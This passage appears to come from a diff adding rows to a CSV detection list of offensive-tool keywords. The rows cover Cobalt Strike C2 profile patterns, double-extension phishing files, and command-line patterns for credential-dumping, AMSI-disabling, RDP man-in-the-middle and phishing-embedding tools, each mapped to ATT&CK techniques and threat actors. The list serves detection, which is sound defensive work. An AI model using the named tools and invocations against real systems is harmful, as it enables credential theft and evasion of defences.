- T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.mobile.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 
- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.mysql.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.news.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*.pdf.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pdf.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.photos.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize 
Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.pic.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.pipename_stager*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.pop.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and 
reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.ppt.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - 
TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - 
TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ps1 -Base *OU=*DC=* -Credentials * -Server *","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON *.json*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*.py -credz *.txt * ","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*.py -k * -f *.bat -o 
*.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.docm -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.docx -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.exe -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.js -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. 
and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*.py -k * -f *.pps -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*.py -k * -f *.ppsx -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*.py -k * -f *.ppt -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*.py -k * -f *.ps1 -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*.py -k * -f *.xll -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*.py -k * -f *.xls -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*.py -k * -f *.xlsb -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*.py -k * -f *.xlsm -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*.py -k * -f *.xlsx -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z"
+"*.py rekall *.dmp* -t 0","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*.py * --fake-server*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z"
+"*.py * amsi -disable*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"*.py * amsi -enable*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work 
with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"*.py * --brop *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z"
+"*.py * --burp *","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z"
+"*.py * -debug -dnstcp*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z"
+"*.py * -k -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*.py * --teamserver *","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*.py *.cs cs ms*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into 
memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z"
